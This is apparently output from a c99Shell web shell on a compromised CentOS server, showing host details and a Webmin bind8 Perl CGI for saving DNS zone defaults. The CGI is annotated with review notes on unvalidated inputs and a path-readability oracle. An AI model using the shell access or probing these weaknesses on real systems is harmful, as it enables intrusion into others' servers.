!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/usr/libexec/webmin/bind8/   drwxr-xr-x
Free 49.58 GB of 127.8 GB (38.8%)


Viewing file:     save_zonedef.cgi (2.83 KB)      -rwxr-xr-x
#!/usr/bin/perl
# save_zonedef.cgi
# Save zone defaults
#
# CGI handler for the "zone defaults" form. It copies submitted form fields
# from %in into three places: the options block of the BIND configuration,
# the module's zonedef file, and the module config (%config).
# Every value read from %in is request-supplied and must be treated as
# untrusted; only some of the fields are validated further down.

# Pulls in the helper subs (and the %text, %access, %config globals) used below.
require './bind8-lib.pl';
# Parse the request; by Webmin convention this fills %in (defined outside this file).
&ReadParse();
# Registers the message from %text for later &error() calls -- presumably used
# as a prefix; confirm in the library.
&error_setup($text{'zonedef_err'});
# Authorisation gate: callers without the 'defaults' ACL flag are refused.
# NOTE(review): everything after this line assumes &error() does not return.
# NOTE(review): no referer/CSRF check is visible in this script; presumably the
# library enforces one when it is loaded -- confirm.
$access{'defaults'} || &error($text{'zonedef_ecannot'});

# Take locks on the BIND config file and the module's zonedef file before
# touching either one.
# NOTE(review): the validation failures further down call &error() while
# these locks are held; whether they are released on that path depends on
# the library -- confirm.
&lock_file(&make_chroot($config{'named_conf'}));
&lock_file("$module_config_directory/zonedef");

# Locate the global "options" block in the parsed configuration.
$conf = &get_config();
$options = &find("options", $conf);

# One check-names directive per zone class for which the form sent a value.
# NOTE(review): $in{master|slave|response} goes into the directive as-is.
# BIND accepts only a small fixed set of check-names modes, so an allow-list
# here would be tighter than relying on how save_directive quotes values.
push(@check,
     map { +{ 'name' => 'check-names',
              'values' => [ $_, $in{$_} ] } }
     grep { $in{$_} } ("master", "slave", "response"));
&save_directive($options, 'check-names', \@check, 1);

# These helpers take only the directive name, so they presumably read the
# matching form fields from %in themselves; their input validation is not
# visible here -- verify in the library.
&save_addr_match("allow-transfer", $options, 1);
&save_addr_match("allow-query", $options, 1);
&save_choice("notify", $options, 1);

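# Validate the four SOA timing defaults, then collect them together with
# their unit selectors into %zonedef (handed to &save_zone_defaults later).
#
# The patterns end in \z rather than $. In Perl, $ also matches just before
# a trailing newline, so a value like "60\n" would pass the old check and
# carry the newline into the stored defaults.
$in{'refresh'} =~ /^\d+\z/ || &error(&text('master_erefresh', $in{'refresh'}));
$in{'retry'} =~ /^\d+\z/ || &error(&text('master_eretry', $in{'retry'}));
$in{'expiry'} =~ /^\d+\z/ || &error(&text('master_eexpiry', $in{'expiry'}));
$in{'minimum'} =~ /^\d+\z/ || &error(&text('master_eminimum', $in{'minimum'}));

# NOTE(review): the four *unit fields are stored with no check at all.
# They should be restricted to the unit codes the form actually offers
# before being saved -- TODO confirm the allowed set against the form page.
%zonedef = ( 'refresh', $in{'refresh'},
         'retry', $in{'retry'},
         'expiry', $in{'expiry'},
         'minimum', $in{'minimum'},
         'refunit', $in{'refunit'},
         'retunit', $in{'retunit'},
         'expunit', $in{'expunit'},
         'minunit', $in{'minunit'} );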

# Rebuild the tmpl_* entries in the module config from the submitted rows.
&lock_file("$module_config_directory/config");

# Drop every existing tmpl_* key. This also clears tmpl_email, tmpl_include
# and the tmpl_dnssec* keys, which the code after this loop sets again.
delete(@config{ grep { /^tmpl_/ } keys %config });

# Walk name_0, name_1, ... until the first index the form did not send.
# $i indexes the submitted rows; $j numbers the rows that are kept, so the
# stored tmpl_N keys stay contiguous when blank rows are skipped.
# NOTE(review): name, type and value are joined and stored with no check
# on their content. Confirm that the config writer rejects or escapes
# embedded newlines, and consider an allow-list for the record type.
$j = 0;
$i = 0;
while (defined($in{"name_$i"})) {
    if ($in{"name_$i"}) {
        # A row flagged def_N is only accepted for type A.
        if ($in{"type_$i"} ne 'A' && $in{"def_$i"}) {
            &error($text{'master_eiptmpl'});
            }
        # The value field is left out when the row's value_N_def flag is set.
        my @parts = ( $in{"name_$i"}, $in{"type_$i"} );
        push(@parts, $in{"value_$i"}) if (!$in{"value_${i}_def"});
        $config{"tmpl_$j"} = join(' ', @parts);
        $j++;
        }
    }
continue {
    $i++;
    }
# Default contact address for new zones.
# NOTE(review): stored exactly as submitted, with no format check.
$config{'tmpl_email'} = $in{'email'};

# Optional template include file: either cleared, or set to a path that
# must be readable and not a directory.
# NOTE(review): the path comes straight from the request and is tested
# against the filesystem with the web server's privileges. Nothing limits
# it to a particular directory, and the error/no-error outcome reveals
# whether an arbitrary path is readable. Access is limited to users holding
# the 'defaults' ACL, but a base-directory restriction would be safer.
if (!$in{'include_def'}) {
    if (!-r $in{'include'} || -d $in{'include'}) {
        &error($text{'master_einclude'});
        }
    $config{'tmpl_include'} = $in{'include'};
    }
else {
    delete($config{'tmpl_include'});
    }
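# Default primary nameserver: either cleared, or set to a submitted
# hostname limited to letters, digits, dot, hyphen and underscore.
if ($in{'prins_def'}) {
    delete($config{'default_prins'});
    }
else {
    # Anchored with \z rather than $: in Perl, $ also matches just before a
    # trailing newline, which would let "host\n" through and into the
    # stored config value.
    $in{'prins'} =~ /^[a-z0-9\.\-\_]+\z/i ||
        &error($text{'zonedef_eprins'});
    $config{'default_prins'} = $in{'prins'};
    }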
# DNSSEC defaults are only stored when the form sent a 'dnssec' field.
# When it did not, the tmpl_dnssec* keys stay removed, because the earlier
# purge of tmpl_* keys already deleted them.
if (defined($in{'dnssec'})) {
    $config{'tmpl_dnssec'} = $in{'dnssec'};
    $config{'tmpl_dnssec_dt'} = $in{'dnssec_dt'};
    if (!$config{'tmpl_dnssec_dt'}) {
        # dnssec_dt unset: record the algorithm and key-size choices.
        # The size is checked by compute_dnssec_key_size, and a failure
        # aborts the request with the message that helper returns.
        # NOTE(review): 'alg' and 'single' are not checked in this script;
        # presumably compute_dnssec_key_size rejects unknown algorithms --
        # confirm.
        $config{'tmpl_dnssecalg'} = $in{'alg'};
        ($ok, $err) = &compute_dnssec_key_size($in{'alg'}, $in{'size_def'},
                                               $in{'size'});
        $ok || &error($err);
        $config{'tmpl_dnssecsizedef'} = $in{'size_def'};
        $config{'tmpl_dnssecsize'} = $in{'size'};
        $config{'tmpl_dnssecsingle'} = $in{'single'};
    }
    else {
        # dnssec_dt set: only the dnssec_dne field is kept.
        # NOTE(review): stored as submitted, with no validation here.
        $config{'tmpl_dnssec_dne'} = $in{'dnssec_dne'};
    }
}
# Persist the rebuilt %config, then release the lock on the module config file.
&save_module_config();
&unlock_file("$module_config_directory/config");

# Store the SOA timing defaults collected in %zonedef.
&save_zone_defaults(\%zonedef);
# Presumably writes the buffered edits made through save_directive and the
# other save_* helpers back to disk -- confirm in the library.
&flush_file_lines();
# Release the remaining two locks (BIND config file and zonedef file).
&unlock_file(&make_chroot($config{'named_conf'}));
&unlock_file("$module_config_directory/zonedef");
# Audit trail: the whole of %in is handed to the logger, so every submitted
# field (validated or not) can end up in the action log.
&webmin_log("zonedef", undef, undef, \%in);
# NOTE(review): assumes redirect("") returns the browser to the module index -- confirm.
&redirect("");

